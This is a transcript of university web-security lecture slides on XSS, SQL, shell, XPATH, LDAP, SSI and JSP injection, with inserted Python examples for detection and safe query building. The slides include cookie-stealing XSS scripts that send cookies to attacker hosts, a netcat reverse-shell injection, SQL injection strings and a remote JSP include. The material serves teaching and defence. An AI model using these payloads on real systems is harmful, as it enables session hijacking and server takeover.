Web Security

Upload: lucy-moody

Post on 23-Dec-2015


TRANSCRIPT

Page 1: Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total

Web Security

Page 2:

Why Web Security: a Real Business Problem

> 60% of total attack attempts observed on the Net are against Web applications

> 80% of vulnerabilities discovered are in web apps

Independent security audit

Regulatory compliance

Page 3:

Auditor finding

– Freeform edit box
– Message to Customer Service
– XSS issue raised

Must provide a response:

– Prove issue to be a non-problem, or
– Describe actions to take

Page 4:

Web Attacks

Cross Site Scripting (XSS)
SQL Injection
Shell Attacks

If interested in more:
XPATH Injection
LDAP Injection
SSI Injection
JSP Injection

Page 5:

Page 6:

Cross Site Scripting

Attacker goal: get their code into the browser

XSS forces a website visitor to execute malicious code in his/her browser

Accounts for roughly 80% of all documented security vulnerabilities

Page 7:

XSS Risks

XSS abuses render engines or plug-ins

Steal browser cookies
Steal session info for replay attack
Malware or bot installation
Redirect or phishing attempt

Page 8:

XSS Example 1

Trudy posts the following JavaScript on a message board:

<script language="javascript">
var url = "http://machineaddress:9000/index.html?cookie=" + encodeURI(document.cookie);
</script>

Then run a TCP server listening on port 9000 with e.g., nc -l -p 9000

When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Page 9:

XSS Demo Instructions

Set port forward to bypass the firewall

ssh -L 8000:netsec-demos:2000 [email protected]

Note: 8000 is the local port; it's forwarded to netsec-demos port 2000 through netsec

Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000

Page 10:

XSS Demo Instructions (II)

Login as ychen and post the script with a sexy title (e.g., hot game!)

<script language="javascript">
var url = "http://dod.cs.northwestern.edu:5000/index.html?cookie=";
url = url + encodeURI(document.cookie);
new Image().src=url;
</script>
Hi Everyone! Thanks for your cookies!

Ssh to any other machine (e.g., netsec.cs.northwestern.edu) and run

nc -l 5000

Page 11:

Simple XSS Code

var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);

document.cookie is the browser's entire cookie for the current website

encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL
– E.g., changing the space character to %20
– Make the URL less suspicious

Page 12:

What can Trudy Do with the Cookie?

Log in as another user (test458); when that user clicks the post, the cookie is sent to Trudy

Crack Bob's password (MD5 hash in the cookie) with John the Ripper or any password cracker

For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/

Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

Page 13:

XSS Example 2

Trudy sends a link of the following URL to Bob that will take him to a personalized page:

http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>

A page is returned that contains the malicious script, and Bob's browser executes the script causing his session cookie to be sent to Trudy

Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

Page 14:

XSS Detection

A client usually is not supposed to send scripts to servers

If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred
– A sanitized script could look like &lt;SCRIPT&gt;…
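Added example (not from the slides): a small Python checker that implements the detection rule above on constructed request/response pairs. It percent-decodes the incoming parameter first, so the hex form (%3Cscript%3E) is caught as well as the plain tag, and then reports whether the same script came back raw, came back HTML-encoded (the sanitized form the slide shows), or did not come back at all. The sample traffic and the verdict labels are constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# A script tag, matched after percent-decoding so the "hex equivalent"
# (%3Cscript%3E) the slide mentions is caught as well as the plain form.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def decode_param(value: str) -> str:
    """Percent-decode twice: once for normal encoding, again for %25-doubled input."""
    return unquote(unquote(value))


def contains_script(value: str) -> bool:
    """True if an incoming parameter carries a <script> tag in any encoding."""
    return SCRIPT_TAG.search(decode_param(value)) is not None


def sanitize(value: str) -> str:
    """Server-side HTML encoding: '<' becomes '&lt;', so the browser shows text."""
    return html.escape(value, quote=True)


def classify(incoming_param: str, outgoing_body: str) -> str:
    """Apply the slide's rule to one request/response pair."""
    if not contains_script(incoming_param):
        return "clean"
    script = decode_param(incoming_param)
    if script in outgoing_body:
        return "attack"      # same script reflected unsanitized
    if sanitize(script) in outgoing_body:
        return "blocked"     # reflected, but HTML-encoded
    return "suspicious"      # script received but not reflected


# Constructed sample traffic (parameter value, response body) for the demo.
SAMPLES = [
    ("hello world", "<p>You searched for: hello world</p>"),
    ("<script>document.title</script>",
     "<p>You searched for: <script>document.title</script></p>"),
    ("%3Cscript%3Edocument.title%3C/script%3E",
     "<p>You searched for: &lt;script&gt;document.title&lt;/script&gt;</p>"),
    ("%253Cscript%253E", "<p>No results</p>"),
]


def scan(samples=SAMPLES) -> list:
    """Return one verdict per (parameter, response) pair."""
    return [classify(p, body) for p, body in samples]


if __name__ == "__main__":
    for (param, _), verdict in zip(SAMPLES, scan()):
        print(f"{verdict:10s} {param}")
```

Decoding before matching is the part that matters: a filter that compares raw bytes never sees "<script" in the %3C form, which is exactly the hex variant the slide warns about.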

Page 15:

SQL Injection

Malicious SQL statements run on a database and thus attack the server
– XSS can only target other users

Page 16:

SQL Injection Example

Trudy accesses Bob's website, in which he does not validate input on his sign in form
– Runs a SQL statement like the following:
– select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';

Set username to ' or '1'='1

select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';

Effect: picks any row where the username is blank and the password matches, or any row where true.

Add "limit 1" to pick the first row

Page 17:

SQL Injection Detection

To detect and prevent this at Bob's location
– Log any traffic from Trudy to Bob containing form data containing a quotation mark
– Match any outgoing SQL statements from Bob's web server to his database server and verify that the quotation marks Trudy supplied were escaped
– If they weren't, take action
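Added example covering the SQL Injection Example and SQL Injection Detection slides (not the slides' or MiniBB's code): a Python script with an in-memory SQLite stand-in for minibbtable_users. It builds the sign-in statement three ways (concatenated as on the slide, with quotes escaped, and parameterized) and runs the two detection steps from the slide: flag a form value containing a quotation mark, then check whether that value reached the outgoing statement with its quotes escaped. The table contents are constructed; because SQLite has no md5() function, the hash is computed in Python before the query, which is an assumption made for the demo.

```python
import hashlib
import sqlite3


def md5(text: str) -> str:
    """The slide's query calls MySQL's md5(); SQLite has none, so hash in Python."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for minibbtable_users with two test users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table minibbtable_users (username text, user_password text)")
    conn.executemany("insert into minibbtable_users values (?, ?)",
                     [("johndoe", md5("johnspassword")),
                      ("alice", md5("alicespassword"))])
    return conn


def build_concat_sql(username: str, password: str) -> str:
    """Vulnerable: the slide's statement with form values pasted in verbatim."""
    return ("select username, user_password from minibbtable_users "
            f"where user_password = '{md5(password)}' and username='{username}'")


def build_escaped_sql(username: str, password: str) -> str:
    """Escaping fix: every quote in the user value is doubled, the SQL-standard escape."""
    safe_name = username.replace("'", "''")
    return ("select username, user_password from minibbtable_users "
            f"where user_password = '{md5(password)}' and username='{safe_name}'")


def run_sql(conn: sqlite3.Connection, sql: str) -> list:
    """Execute a finished statement and return the matching usernames, sorted."""
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Preferred fix: placeholders; the driver binds values, so quotes stay data."""
    sql = ("select username, user_password from minibbtable_users "
           "where user_password = ? and username = ?")
    return sorted(row[0] for row in conn.execute(sql, (md5(password), username)))


def form_has_quote(form: dict) -> bool:
    """Slide step 1: flag any form submission that contains a quotation mark."""
    return any("'" in str(v) for v in form.values())


def quotes_escaped(user_value: str, outgoing_sql: str) -> bool:
    """Slide step 2: if a quoted user value is embedded in the outgoing statement,
    its quotes must appear escaped ('' or \\'); a parameterized statement never
    embeds the value at all and passes as well."""
    if "'" not in user_value or user_value not in outgoing_sql:
        return True
    return (user_value.replace("'", "''") in outgoing_sql
            or user_value.replace("'", "\\'") in outgoing_sql)


if __name__ == "__main__":
    conn = make_db()
    form = {"username": "' or '1'='1", "password": "anyrandompassword"}
    sql = build_concat_sql(form["username"], form["password"])
    print("quote in form     :", form_has_quote(form))
    print("quotes escaped    :", quotes_escaped(form["username"], sql))
    print("concatenated query:", run_sql(conn, sql))
    print("parameterized     :",
          login_parameterized(conn, form["username"], form["password"]))
```

With the slide's username the concatenated statement returns every row, because AND binds tighter than OR and the trailing '1'='1' is always true; the escaped and parameterized versions return nothing, since the whole string is now compared against the username column as data.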

Page 18:

Shell Attacks

Control an actual machine like a web server

Page 19:

Shell Attacks

Inject commands into scripts that use Linux utilities
– E.g., with ";" as command separator in UNIX/LINUX

CGI programs like perl can use command-line programs (e.g. grep, ls)

Unsanitized input as arguments can lead to command execution.

Page 20:

Shell Attacks Demo

Search engine in MiniBB webserver executes
system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");

Put phrase as: >/dev/null; id; echo randomdata
– Hide user ID
– Store random data in logs to evade detection

We can even get a remote shell!
– >/dev/null; nc netsec 9000 -e /bin/sh
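Added example for the two Shell Attacks slides (not the slides' or MiniBB's code): a Python script that shows the three ways the search-log call can be written. The concatenated form is only built as a string and returned, so the reader can see where the phrase lands in the command line; the quoted form uses shlex.quote when a shell is unavoidable; the preferred form passes each value as its own argv element with no shell at all. A small input filter flags phrases carrying shell metacharacters. The child process is a tiny Python stand-in for echo (an assumption made so the block runs on any platform), and the demo phrase is modelled on the slide.

```python
import json
import re
import shlex
import subprocess
import sys

# Characters that change how a POSIX shell parses a command line.
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\\\n\"']")


def phrase_is_suspicious(phrase: str) -> bool:
    """Input filter: flag a search phrase carrying shell metacharacters."""
    return SHELL_METACHARS.search(phrase) is not None


def command_line_concat(user: str, phrase: str) -> str:
    """The vulnerable shape from the slide, returned rather than run: the phrase
    is spliced into one string that a shell would parse, separators and all."""
    return f"echo {user} {phrase} >>/tmp/searchlogs"


def command_line_quoted(user: str, phrase: str) -> str:
    """If a shell is unavoidable, shlex.quote turns each value into one literal word."""
    return f"echo {shlex.quote(user)} {shlex.quote(phrase)} >>/tmp/searchlogs"


def log_search_argv(user: str, phrase: str) -> list:
    """Preferred fix: no shell at all. Each value is its own argv element, so
    metacharacters are never interpreted. The child is a Python stand-in for
    echo (assumption for portability) that reports the argv it received."""
    result = subprocess.run(
        [sys.executable, "-c",
         "import json, sys; print(json.dumps(sys.argv[1:]))", user, phrase],
        capture_output=True, text=True, check=True)
    return json.loads(result.stdout)


if __name__ == "__main__":
    # Constructed input modelled on the slide's demo phrase.
    phrase = ">/dev/null; id; echo randomdata"
    print("suspicious:", phrase_is_suspicious(phrase))
    print("concat    :", command_line_concat("ychen", phrase))
    print("quoted    :", command_line_quoted("ychen", phrase))
    print("argv      :", log_search_argv("ychen", phrase))
```

In the argv version the whole phrase, including ";" and ">", arrives in the child as a single argument and is never parsed as a command, which is the property the concatenated system() call lacks.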

Page 21:

Defense Approaches

Web firewall/IDS
– ModSecurity for Apache
– Commercial: SecureSphere from Imperva

Static code analysis
– Open source: Nikto
– Commercial: Acunetix Web Vulnerability Scanner, N-Stalker

Education on good coding
– HTML encoding on input (server-side)
– Input validation/filtering

Page 22:

Backup Slides

Page 23:

XPATH Injection Example

Similar to SQL injection

Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:
– string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())

Trudy again can provide the following password to change the statement's logic:
– X' OR 'x'='x
– The statement thus selects the first account

Page 24:

LDAP Injection Example

Server using LDAP for authentication
– User name initialized, but then uses unchecked user input to create a query

filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

Attacker can exploit using special characters

http://example/ldapsearch.asp?user=*

Page 25:

LDAP Injection Detection

Detection is based off of usage of special LDAP characters
– System monitors input for special characters
– Either scrubs incoming input or watches for unescaped output passed to database server

Detection approach is blackbox
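Added example covering the XPATH Injection, LDAP Injection Example and LDAP Injection Detection slides (not the slides' code): a Python script that builds the two queries from the slides both unchecked and with the user value rendered as a literal that cannot close early. For LDAP it hex-escapes the filter metacharacters defined in RFC 4515 and implements both detection options from the slide (monitor the input for special characters; watch the outgoing filter for unescaped ones). For XPath, which has no escape sequence inside a string literal, it picks the quote kind the value does not contain and falls back to concat() when it contains both. The sample inputs are the slides' own "*" and X' OR 'x'='x; the function names are this example's.

```python
import re

# RFC 4515 section 3: these characters must be escaped inside a filter value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
_LDAP_SPECIAL = re.compile(r"[\\*()\x00]")


def escape_ldap_value(value: str) -> str:
    """Hex-escape filter metacharacters so the value matches literally."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def has_ldap_special(value: str) -> bool:
    """Slide's monitor: does the incoming value use special LDAP characters?"""
    return _LDAP_SPECIAL.search(value) is not None


def ldap_filter_unchecked(user_name: str) -> str:
    """The slide's filter = "(uid=" + CStr(userName) + ")" with no checking."""
    return "(uid=" + user_name + ")"


def ldap_filter_escaped(user_name: str) -> str:
    """Scrubbed variant: user input can no longer become a wildcard or a new clause."""
    return "(uid=" + escape_ldap_value(user_name) + ")"


def unescaped_special_in_output(user_value: str, outgoing_filter: str) -> bool:
    """Slide's alternative: watch the filter sent to the directory server and
    alert when user-supplied special characters reach it unescaped."""
    return has_ldap_special(user_value) and user_value in outgoing_filter


def xpath_literal(value: str) -> str:
    """Render value as an XPath 1.0 string literal. XPath has no escape sequence
    inside a literal, so a value holding both quote kinds is built with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def xpath_query_unchecked(user_name: str, user_pass: str) -> str:
    """The slide's query with USER_NAME / USER_PASS substituted verbatim."""
    return (f"string(//user[name/text()='{user_name}' and "
            f"password/text()='{user_pass}']/account/text())")


def xpath_query_safe(user_name: str, user_pass: str) -> str:
    """Same query, with each value emitted as a literal that cannot close early."""
    return (f"string(//user[name/text()={xpath_literal(user_name)} and "
            f"password/text()={xpath_literal(user_pass)}]/account/text())")


if __name__ == "__main__":
    # Constructed inputs taken from the slides' examples.
    for build in (ldap_filter_unchecked, ldap_filter_escaped):
        print(build.__name__, build("*"))
    for build in (xpath_query_unchecked, xpath_query_safe):
        print(build.__name__, build("bob", "X' OR 'x'='x"))
```

With "*" the unchecked filter becomes (uid=*) and matches every entry, while the escaped filter is (uid=\2a) and matches only a uid that literally contains an asterisk; with the slide's password the safe XPath predicate reads password/text()="X' OR 'x'='x", a single literal rather than an OR clause.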

Page 26:

SSI Injection Example

Bob has his server configured to use Server-Side Includes

Trudy passes input with an SSI embedded
<!--#INCLUDE VIRTUAL="/web.config"-->

SSI inserts malicious code into normal webpages upon next request

Future legitimate users get content containing the tainted code included by the SSI

Page 27:

JSP Injection Example

Similar to SSI injection

Bob has a portal server configured to use dynamic code for templates

Trudy passes input with an embedded <jsp:include "http://bad.com/1.jsp" >

Malicious code inserted into webpage

Page 28:

JSP Injection Prevention

Prefer static include <%include …>
Don't allow file inclusion outside of server via Java2 Security policies
Firewall rules to prevent outbound requests from server
Input validation coding
Choose portal software not requiring dynamic includes or code execution

Page 29:

Q&A

Suggestions?